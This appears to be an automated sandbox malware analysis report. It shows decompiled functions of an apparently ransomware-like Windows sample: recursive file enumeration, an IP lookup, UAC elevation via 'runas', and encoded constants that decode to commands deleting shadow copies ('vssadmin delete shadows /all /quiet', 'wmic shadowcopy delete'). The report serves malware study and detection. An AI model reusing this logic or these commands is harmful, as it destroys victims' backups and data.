Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpenVirtuallstrlen$AllocConnectFreewsprintf
String ID: GET$ipv4bot.whatismyipaddress.com
API String ID: 4289327240-2259699238
Opcode ID: f6e984b446ea9cd393b48de9e600680bd352efed8e23861790de7f30075ba64f
Instruction ID: 036ff581c335500f2984d10930e2f34b8e696fb6c4e233a2217fb5cd2a6ee9c0
Opcode Fuzzy Hash: f6e984b446ea9cd393b48de9e600680bd352efed8e23861790de7f30075ba64f
Instruction Fuzzy Hash: 6201B13574020577EB206B729E4EF9F3A38AB85B11F140036FA05F61C1DEB89959C6AD

Uniqueness

Uniqueness Score: -1.00%

Function 004066F0 Relevance: 13.6, APIs: 9, Instructions: 109
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E004066F0(void* __eax, WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8, intOrPtr* _a12) {
				void* _v12;
				intOrPtr _v16;
				WCHAR* _v20;
				intOrPtr _v24;
				struct _WIN32_FIND_DATAW _v616;
				void* _t35;
				signed int _t37;
				int _t39;
				signed int _t42;
				void* _t46;
				signed int* _t48;
				WCHAR* _t53;
				intOrPtr* _t54;
				short _t57;
				WCHAR* _t63;
				void* _t67;

				_v24 = __edx;
				_t63 = __ecx;
				"SVWj@h"();
				if(__eax == 0 || E004064A0(__ecx) != 0) {
					L17:
					__eflags = 0;
					return 0;
				} else {
					E00406640(__ecx);
					_t53 =  &(_t63[lstrlenW(__ecx)]);
					_v20 = _t53;
					lstrcatW(_t63, "*");
					_t35 = FindFirstFileW(_t63,  &_v616);
					_t57 = 0;
					_v12 = _t35;
					 *_t53 = 0;
					if(_t35 != 0xffffffff) {
						_t54 = _a12;
						do {
							_t37 = lstrcmpW( &(_v616.cFileName), ".");
							__eflags = _t37;
							if(_t37 != 0) {
								_t42 = lstrcmpW( &(_v616.cFileName), L"..");
								__eflags = _t42;
								if(_t42 != 0) {
									lstrcatW(_t63,  &(_v616.cFileName));
									__eflags = _v616.dwFileAttributes & 0x00000010;
									if((_v616.dwFileAttributes & 0x00000010) == 0) {
										_v16 =  *_t54;
										_t46 = E004063B0(_t63,  &_v616, _t57, _a4);
										_t67 = _t67 + 8;
										 *_t54 =  *_t54 + _t46;
										asm("adc [ebx+0x4], edx");
										__eflags =  *((intOrPtr*)(_t54 + 4)) -  *((intOrPtr*)(_t54 + 4));
										if(__eflags <= 0) {
											if(__eflags < 0) {
												L12:
												_t48 = _a8;
												 *_t48 =  *_t48 + 1;
												__eflags =  *_t48;
											} else {
												__eflags = _v16 -  *_t54;
												if(_v16 <  *_t54) {
													goto L12;
												}
											}
										}
									} else {
										E004066F0(lstrcatW(_t63, "\\"), _t63, _v24, _a4, _a8, _t54);
										_t67 = _t67 + 0xc;
									}
									_t57 = 0;
									__eflags = 0;
									 *_v20 = 0;
								}
							}
							_t39 = FindNextFileW(_v12,  &_v616);
							__eflags = _t39;
						} while (_t39 != 0);
						FindClose(_v12);
						goto L17;
					} else {
						return 0xdeadbeaf;
					}
				}
			}

APIs

Part of subcall function 00406110: VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,00406706,00000000,?,?), ref: 00406123
Part of subcall function 00406110: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,00406706,00000000,?,?), ref: 004061AE
Part of subcall function 00406110: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,00406706,00000000,?,?), ref: 004061C8
Part of subcall function 00406110: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,00406706,00000000,?,?), ref: 004061E2
Part of subcall function 00406110: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,00406706,00000000,?,?), ref: 004061FC
Part of subcall function 00406110: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00406706,00000000,?,?), ref: 0040621C

Part of subcall function 004064A0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 004064B2
Part of subcall function 004064A0: lstrcatW.KERNEL32(00000000,00410364), ref: 004064C4
Part of subcall function 004064A0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 004064D2
Part of subcall function 004064A0: lstrcmpW.KERNEL32(?,00410368,?,?), ref: 004064FC
Part of subcall function 004064A0: lstrcmpW.KERNEL32(?,0041036C,?,?), ref: 00406512
Part of subcall function 004064A0: lstrcatW.KERNEL32(00000000,?), ref: 00406524
Part of subcall function 004064A0: lstrlenW.KERNEL32(00000000,?,?), ref: 0040652B
Part of subcall function 004064A0: lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0040655A
Part of subcall function 004064A0: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 00406571
Part of subcall function 004064A0: GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0040657C
Part of subcall function 004064A0: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0040659A
Part of subcall function 004064A0: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 004065AF

Part of subcall function 00406640: VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,00406722,00000000,?,?), ref: 00406655
Part of subcall function 00406640: wsprintfW.USER32 ref: 00406663
Part of subcall function 00406640: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0040667F
Part of subcall function 00406640: GetLastError.KERNEL32(?,?), ref: 0040668C
Part of subcall function 00406640: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 004066D8

lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 00406723
lstrcatW.KERNEL32(00000000,00410364), ref: 0040673B
FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00406745
lstrcmpW.KERNEL32(?,00410368,?,?), ref: 0040677C
lstrcmpW.KERNEL32(?,0041036C,?,?), ref: 00406796
lstrcatW.KERNEL32(00000000,?), ref: 004067A8
lstrcatW.KERNEL32(00000000,0041039C), ref: 004067B9
FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0040681D
FindClose.KERNEL32(00003000,?,?), ref: 0040682E

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: File$Virtuallstrcatlstrcmp$FindFolderPathSpecial$Alloclstrlen$CreateFirstFree$CloseErrorLastNextReadSizewsprintf
String ID:
API String ID: 1112924665-0
Opcode ID: eb068d23bd4874913e40b584eb86acccd6cc11bc9de15272c1017f03ccff3c16
Instruction ID: e664c09a6a9c308cb7d1e0fe319252d12530e52bee12665a8dc8c6cfb3a3f5dc
Opcode Fuzzy Hash: eb068d23bd4874913e40b584eb86acccd6cc11bc9de15272c1017f03ccff3c16
Instruction Fuzzy Hash: 60318F71A00219ABDF10AF65DD84AAE77B8EF44314B0584B7F806F7291DB389E50CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00402F50 Relevance: 10.6, APIs: 7, Instructions: 86
memoryCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E00402F50(WCHAR* __ecx) {
				unsigned int _v8;
				char _v12;
				WCHAR* _v16;
				short _v2064;
				long _t17;
				void* _t18;
				WCHAR* _t23;
				unsigned int _t31;
				void* _t35;
				intOrPtr* _t39;
				signed int _t40;

				_t39 = __imp__EnumDeviceDrivers;
				_v16 = __ecx;
				_v8 = 0;
				 *_t39( &_v12, 4,  &_v8);
				_t17 = _v8;
				if(_t17 != 0) {
					_t18 = VirtualAlloc(0, _t17, 0x3000, 4);
					_t35 = _t18;
					if(_t35 != 0) {
						_push( &_v12);
						_push(_v8);
						_push(_t35);
						if( *_t39() == 0) {
							L10:
							VirtualFree(_t35, 0, 0x8000);
							return 0;
						} else {
							_t40 = 0;
							_t31 = _v8 >> 2;
							if(_t31 <= 0) {
								goto L10;
							} else {
								while(1) {
									_t23 =  &_v2064;
									__imp__GetDeviceDriverBaseNameW( *((intOrPtr*)(_t35 + _t40 * 4)), _t23, 0x400);
									if(_t23 != 0 && lstrcmpiW( &_v2064, _v16) == 0) {
										break;
									}
									_t40 = _t40 + 1;
									if(_t40 < _t31) {
										continue;
									} else {
										goto L10;
									}
									goto L12;
								}
								VirtualFree(_t35, 0, 0x8000);
								return 1;
							}
						}
					} else {
						return _t18;
					}
				} else {
					return _t17;
				}
				L12:
			}

0x00402f5a
0x00402f69
0x00402f6d
0x00402f74
0x00402f76
0x00402f7b
0x00402f8d
0x00402f93
0x00402f97
0x00402fa3
0x00402fa4
0x00402fa7
0x00402fac
0x00402ff2
0x00402ffa
0x00403008
0x00402fae
0x00402fb1
0x00402fb3
0x00402fb8
0x00000000
0x00402fc0
0x00402fc0
0x00402fc5
0x00402fcf
0x00402fd7
0x00000000
0x00000000
0x00402fed
0x00402ff0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00402ff0
0x00403011
0x00403022
0x00403022
0x00402fb8
0x00402f99
0x00402f9e
0x00402f9e
0x00402f81
0x00402f81
0x00402f81
0x00000000

APIs

EnumDeviceDrivers.PSAPI(?,00000004,?), ref: 00402F74
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00402F8D

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: AllocDeviceDriversEnumVirtual
String ID:
API String ID: 4140748134-0
Opcode ID: 0a6431d7b680dec11b95763bc23b6023e0c9d24f66c7ef9fbc3c6dcadf6177f1
Instruction ID: ae1065d34e0a9f40daa088a41d748c469a9f576a3d92cbe81eb507f1f3ca9255
Opcode Fuzzy Hash: 0a6431d7b680dec11b95763bc23b6023e0c9d24f66c7ef9fbc3c6dcadf6177f1
Instruction Fuzzy Hash: 9621A43260011AABEB109B989D89FAAB7BCEB44715F1001B6EE04E61D0D7B19D05AB94

Uniqueness

Uniqueness Score: -1.00%

Function 004077F0 Relevance: 98.1, APIs: 2, Strings: 54, Instructions: 88
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004077F0(void* __ecx) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				short _v224;
				WCHAR* _t62;
				void* _t64;

				_v8 = 0;
				_v224 = 0x6f004d;
				_v220 = 0x69007a;
				_v216 = 0x6c006c;
				_v212 = 0x2f0061;
				_v208 = 0x2e0035;
				_v204 = 0x200030;
				_v200 = 0x570028;
				_v196 = 0x6e0069;
				_v192 = 0x6f0064;
				_v188 = 0x730077;
				_v184 = 0x4e0020;
				_v180 = 0x200054;
				_v176 = 0x2e0036;
				_v172 = 0x3b0031;
				_v168 = 0x570020;
				_v164 = 0x57004f;
				_v160 = 0x340036;
				_v156 = 0x200029;
				_v152 = 0x700041;
				_v148 = 0x6c0070;
				_v144 = 0x570065;
				_v140 = 0x620065;
				_v136 = 0x69004b;
				_v132 = 0x2f0074;
				_v128 = 0x330035;
				_v124 = 0x2e0037;
				_v120 = 0x360033;
				_v116 = 0x280020;
				_v112 = 0x48004b;
				_v108 = 0x4d0054;
				_v104 = 0x2c004c;
				_v100 = 0x6c0020;
				_v96 = 0x6b0069;
				_v92 = 0x200065;
				_v88 = 0x650047;
				_v84 = 0x6b0063;
				_v80 = 0x29006f;
				_v76 = 0x430020;
				_v72 = 0x720068;
				_v68 = 0x6d006f;
				_v64 = 0x2f0065;
				_v60 = 0x350035;
				_v56 = 0x30002e;
				_v52 = 0x32002e;
				_v48 = 0x380038;
				_v44 = 0x2e0033;
				_v40 = 0x370038;
				_v36 = 0x530020;
				_v32 = 0x660061;
				_v28 = 0x720061;
				_v24 = 0x2f0069;
				_v20 = 0x330035;
				_v16 = 0x2e0037;
				_v12 = 0x360033;
				_t62 = InternetOpenW( &_v224, 0, 0, 0, 0);
				 *(__ecx + 4) = _t62;
				if(_t62 == 0) {
					_t64 = InternetOpenW( &_v224, 1, _t62, _t62, 0x10000000);
					 *(__ecx + 4) = _t64;
					return _t64;
				}
				return _t62;
			}

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004079D4
InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 004079ED

Strings

O, xrefs: 004078AB
, xrefs: 00407879
7, xrefs: 004079C6
7, xrefs: 00407909
o, xrefs: 00407956
c, xrefs: 0040794F
G, xrefs: 00407948
, xrefs: 0040795D
z, xrefs: 0040781F
h, xrefs: 00407964
5, xrefs: 00407979
5, xrefs: 004079BF
T, xrefs: 00407883
o, xrefs: 0040796B
, xrefs: 004078A1
., xrefs: 00407987
d, xrefs: 00407865
e, xrefs: 00407972
T, xrefs: 00407925
w, xrefs: 0040786F
(, xrefs: 00407851
M, xrefs: 00407814
e, xrefs: 004078E7
), xrefs: 004078BF
6, xrefs: 004078B5
p, xrefs: 004078D3
l, xrefs: 00407829
, xrefs: 00407933
6, xrefs: 0040788D
8, xrefs: 0040799C
., xrefs: 00407980
i, xrefs: 004079B8
8, xrefs: 0040798E
0, xrefs: 00407847
5, xrefs: 0040783D
1, xrefs: 00407897
3, xrefs: 00407995
K, xrefs: 004078F1
3, xrefs: 004079CD
i, xrefs: 0040793A
a, xrefs: 004079B1
K, xrefs: 0040791E
a, xrefs: 00407833
L, xrefs: 0040792C
a, xrefs: 004079AA
t, xrefs: 004078FB
e, xrefs: 00407941
i, xrefs: 0040785B
5, xrefs: 00407902
e, xrefs: 004078DD
3, xrefs: 00407910
, xrefs: 00407917
, xrefs: 004079A3
A, xrefs: 004078C9

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID: $ $ $ $ $ $($)$.$.$0$1$3$3$3$5$5$5$5$6$6$7$7$8$8$A$G$K$K$L$M$O$T$T$a$a$a$c$d$e$e$e$e$h$i$i$i$l$o$o$p$t$w$z
API String ID: 2038078732-2805935662
Opcode ID: e653d41a08787fca1086a43a758d594d3257da7c4271a42bac81f70514e5fa4e
Instruction ID: 8ec0cbb63084930b06e9c442bfdedbe0f88dfa63fe684bf69a99aafbe0ca1518
Opcode Fuzzy Hash: e653d41a08787fca1086a43a758d594d3257da7c4271a42bac81f70514e5fa4e
Instruction Fuzzy Hash: 0541A8B4811369DEEB21CF91999879EBFF5BB04748F50819ED5087B201C7F60A89CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00404330 Relevance: 78.8, APIs: 5, Strings: 40, Instructions: 99
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E00404330(void* __eflags) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char _v120;
				short _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				char _v152;
				short _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char _v172;
				short* _v176;
				short* _t51;
				WCHAR* _t59;
				void* _t62;
				signed int _t66;
				void* _t69;

				if(E00403AE0(_t62) == 0) {
					_v172 = 0x63005c;
					_v168 = 0x64006d;
					_v8 = 0;
					_t59 =  &_v172;
					_v164 = 0x65002e;
					_t51 =  &_v84;
					_v160 = 0x650078;
					_v156 = 0;
					_v84 = 0x63002f;
					_v80 = 0x760020;
					_v76 = 0x730073;
					_v72 = 0x640061;
					_v68 = 0x69006d;
					_v64 = 0x20006e;
					_v60 = 0x650064;
					_v56 = 0x65006c;
					_v52 = 0x650074;
					_v48 = 0x730020;
					_v44 = 0x610068;
					_v40 = 0x6f0064;
					_v36 = 0x730077;
					_v32 = 0x2f0020;
					_v28 = 0x6c0061;
					_v24 = 0x20006c;
					_v20 = 0x71002f;
					_v16 = 0x690075;
					_v12 = 0x740065;
				} else {
					_v152 = 0x77005c;
					_v148 = 0x650062;
					_t59 =  &_v152;
					_v144 = 0x5c006d;
					_t51 =  &_v120;
					_v140 = 0x6d0077;
					_v136 = 0x630069;
					_v132 = 0x65002e;
					_v128 = 0x650078;
					_v124 = 0;
					_v120 = 0x680073;
					_v116 = 0x640061;
					_v112 = 0x77006f;
					_v108 = 0x6f0063;
					_v104 = 0x790070;
					_v100 = 0x640020;
					_v96 = 0x6c0065;
					_v92 = 0x740065;
					_v88 = 0x65;
				}
				_v176 = _t51;
				_t69 = VirtualAlloc(0, 0x400, 0x3000, 0x40);
				if(_t69 != 0) {
					GetSystemDirectoryW(_t69, 0x100);
					lstrcatW(_t69, _t59);
					ShellExecuteW(0, L"open", _t69, _v176, 0, 0);
					asm("sbb edi, edi");
					_t66 =  ~0x20;
				} else {
					_t66 = 0;
				}
				VirtualFree(_t69, 0, 0x8000);
				return _t66;
			}

APIs

Part of subcall function 00403AE0: _memset.LIBCMT ref: 00403B32
Part of subcall function 00403AE0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 00403B56
Part of subcall function 00403AE0: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 00403B5A
Part of subcall function 00403AE0: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 00403B5E
Part of subcall function 00403AE0: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 00403B85

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000040), ref: 004044EF
GetSystemDirectoryW.KERNEL32(00000000,00000100), ref: 00404505
lstrcatW.KERNEL32(00000000,0063005C), ref: 0040450D
ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000,00000000), ref: 00404523
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00404537

Strings

i, xrefs: 00404376
, xrefs: 0040446A
/, xrefs: 00404419
d, xrefs: 00404480
p, xrefs: 004043B3
open, xrefs: 0040451C
\, xrefs: 0040434E
a, xrefs: 00404431
w, xrefs: 0040448B
a, xrefs: 004044A1
, xrefs: 004043BB
m, xrefs: 004043EC
t, xrefs: 0040445F
h, xrefs: 00404475
b, xrefs: 00404356
, xrefs: 00404496
l, xrefs: 004044AC
s, xrefs: 00404393
o, xrefs: 004043A3
m, xrefs: 00404439
l, xrefs: 00404454
x, xrefs: 0040440C
, xrefs: 00404421
e, xrefs: 004043CB
u, xrefs: 004044C2
e, xrefs: 004044CD
e, xrefs: 004043D3
., xrefs: 0040437E
/, xrefs: 004044B7
c, xrefs: 004043AB
m, xrefs: 00404362
s, xrefs: 00404429
x, xrefs: 00404386
w, xrefs: 0040436E
a, xrefs: 0040439B
n, xrefs: 00404441
\, xrefs: 004043E2
., xrefs: 00404400
e, xrefs: 004043C3
d, xrefs: 00404449

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: ConditionMask$Virtual$AllocDirectoryExecuteFreeInfoShellSystemVerifyVersion_memsetlstrcat
String ID: $ $ $ $.$.$/$/$\$\$a$a$a$b$c$d$d$e$e$e$e$h$i$l$l$m$m$m$n$o$open$p$s$s$t$u$w$w$x$x
API String ID: 2684037697-4098772853
Opcode ID: 457aec27be439b32d5edbcfb73d8ffc908ef2337d77650b0000b9c1325a34fbc
Instruction ID: b655391ad336c4b4d1e3433ef327ff3d08d390bc764b3395417c8c24b6d0b817
Opcode Fuzzy Hash: 457aec27be439b32d5edbcfb73d8ffc908ef2337d77650b0000b9c1325a34fbc
Instruction Fuzzy Hash: 7D41FAB0248380DFE3208F119949B5BBEE6BBC5B49F10491DE6985A291C7F6854CCF9B

Uniqueness

Uniqueness Score: -1.00%

Function 00403BA0 Relevance: 77.1, APIs: 9, Strings: 35, Instructions: 109
memorysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00403BA0(void* __ecx, void* __edx, void* __eflags) {
				char _v1020;
				short _v1028;
				char _v1532;
				short _v1540;
				intOrPtr _v1548;
				intOrPtr _v1552;
				intOrPtr _v1556;
				intOrPtr _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				intOrPtr _v1580;
				intOrPtr _v1584;
				intOrPtr _v1588;
				intOrPtr _v1592;
				intOrPtr _v1596;
				intOrPtr _v1600;
				intOrPtr _v1604;
				intOrPtr _v1608;
				intOrPtr _v1612;
				intOrPtr _v1616;
				short _v1620;
				intOrPtr _v1624;
				intOrPtr _v1628;
				intOrPtr _v1632;
				intOrPtr _v1636;
				intOrPtr _v1640;
				intOrPtr _v1644;
				intOrPtr _v1648;
				intOrPtr _v1652;
				intOrPtr _v1656;
				intOrPtr _v1660;
				intOrPtr _v1664;
				intOrPtr _v1668;
				intOrPtr _v1672;
				short _v1676;
				char _v1680;
				int _t54;
				struct HWND__* _t62;
				long _t66;
				void* _t76;
				void* _t78;
				void* _t80;

				_t78 = __ecx;
				_t54 = E00403AE0(__edx);
				if(_t54 != 0) {
					_t54 = E00403A60();
					if(_t54 == 0) {
						_v1676 = 0x770025;
						_v1672 = 0x6e0069;
						_v1668 = 0x690064;
						_v1664 = 0x250072;
						_v1660 = 0x73005c;
						_v1656 = 0x730079;
						_v1652 = 0x650074;
						_v1648 = 0x33006d;
						_v1644 = 0x5c0032;
						_v1640 = 0x620077;
						_v1636 = 0x6d0065;
						_v1632 = 0x77005c;
						_v1628 = 0x69006d;
						_v1624 = 0x63;
						ExpandEnvironmentStringsW( &_v1676,  &_v1540, 0xff);
						_v1620 = 0x720070;
						_v1616 = 0x63006f;
						_v1612 = 0x730065;
						_v1608 = 0x200073;
						_v1604 = 0x610063;
						_v1600 = 0x6c006c;
						_v1596 = 0x630020;
						_v1592 = 0x650072;
						_v1588 = 0x740061;
						_v1584 = 0x200065;
						_v1580 = 0x630022;
						_v1576 = 0x64006d;
						_v1572 = 0x2f0020;
						_v1568 = 0x200063;
						_v1564 = 0x740073;
						_v1560 = 0x720061;
						_v1556 = 0x200074;
						_v1552 = 0x730025;
						_v1548 = 0x22;
						wsprintfW( &_v1028,  &_v1620, _t78);
						_t76 = VirtualAlloc(0, 0x3d, 0x3000, 0x40);
						 *_t76 = 0x3c;
						 *(_t76 + 4) = 0x40;
						_t62 = GetForegroundWindow();
						_t80 = 0;
						 *(_t76 + 8) = _t62;
						_v1680 = 0x750072;
						_v1676 = 0x61006e;
						_v1672 = 0x73;
						 *((intOrPtr*)(_t76 + 0xc)) =  &_v1680;
						 *((intOrPtr*)(_t76 + 0x10)) =  &_v1532;
						 *((intOrPtr*)(_t76 + 0x14)) =  &_v1020;
						 *(_t76 + 0x18) = 0;
						 *(_t76 + 0x1c) = 0;
						 *(_t76 + 0x20) = 0;
						while(1) {
							_t66 = ShellExecuteExW(_t76);
							if(_t66 != 0) {
								break;
							}
							_t80 = _t80 + 1;
							if(_t80 < 0x64) {
								continue;
							}
							_t54 = VirtualFree(_t76, _t66, 0x8000);
							goto L6;
						}
						WaitForSingleObject( *(_t76 + 0x38), 0xffffffff);
						CloseHandle( *(_t76 + 0x38));
						ExitProcess(0);
					}
				}
				L6:
				return _t54;
			}

APIs

Part of subcall function 00403AE0: _memset.LIBCMT ref: 00403B32
Part of subcall function 00403AE0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 00403B56
Part of subcall function 00403AE0: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 00403B5A
Part of subcall function 00403AE0: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 00403B5E
Part of subcall function 00403AE0: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 00403B85

Part of subcall function 00403A60: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00403A90

ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00403C4D
wsprintfW.USER32 ref: 00403D17
VirtualAlloc.KERNEL32(00000000,0000003D,00003000,00000040), ref: 00403D2B
GetForegroundWindow.USER32 ref: 00403D40
ShellExecuteExW.SHELL32(00000000), ref: 00403DA1
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00403DB4
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00403DC6
CloseHandle.KERNEL32(?), ref: 00403DCF
ExitProcess.KERNEL32 ref: 00403DD7

Strings

r, xrefs: 00403BF5
w, xrefs: 00403C25
2, xrefs: 00403C1D
e, xrefs: 00403C2D
r, xrefs: 00403C99
n, xrefs: 00403D5D
r, xrefs: 00403D55
\, xrefs: 00403BFD
c, xrefs: 00403C45
a, xrefs: 00403CEB
%, xrefs: 00403D01
e, xrefs: 00403C71
p, xrefs: 00403C58
s, xrefs: 00403D65
, xrefs: 00403CCA
t, xrefs: 00403CF6
a, xrefs: 00403CA1
m, xrefs: 00403CBF
